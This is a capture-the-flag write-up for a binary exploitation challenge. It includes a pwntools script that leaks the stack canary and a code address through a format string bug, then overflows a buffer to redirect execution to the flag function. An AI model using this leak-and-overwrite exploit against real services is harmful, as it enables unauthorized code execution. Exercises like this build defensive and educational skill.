Description
There’s a service at …, exploit it to get the flag.
Files
flag.txt (You need this in same directory as fiap for local exploit. fiap will read flag once you exploit it)
Enumeration
checksec
Running the code
Static Analysis
flag function
say_hi function
It takes two inputs from the user. First input is printed.
Since PIE is enabled, we would need to leak the stack for canary and leak the code section to override the changed canary with correct canary and override the ret with flag.
Exploit
First we will use the first BoF and string format vulnerability to leak the address of say_hi+13 and stack_canary. Here we have to use “%#$p” where # is the offset in the stack instead of using many “%p” to reveal the stack. Because offset we want to look into will be overwritten by %p. offset 3 is say_hi+13 address and offset 11 is canary address.
Then we would need to figure out where canary and ret reside when you are doing second BoF. Once you figure that out, we can make exploit that has PADDING + Canary Address + Padding2 + RET Address(Here we want to return to flag function).
from pwn import *
isLocal = True
if isLocal:
p = process("./fiap")
else:
p = remote("95.216.233.106",17954)
p.recvline()
p.recvline()
p.recvline()
p.recvline()
p.recvline()
p.recvline()
p.recvline()
p.recvline()
p.recvline()
p.recvline()
p.sendline("%3$p %11$p ")
first_recv = p.recvline().split(" ")
SAY_HI_13 = int(first_recv[2], 16)
CANARY = int(first_recv[3] , 16)
FLAG = SAY_HI_13 - 134
PADDING = 'A' * 25
#
# Padding
# Canary
# Padding 2
# FLAG
PADDING2 = 'B' * 12
buf = ''
buf += PADDING
buf += p32(CANARY)
buf += PADDING2
buf += p32(FLAG)
p.sendline(buf)
p.recvline()
print(p.recvline())
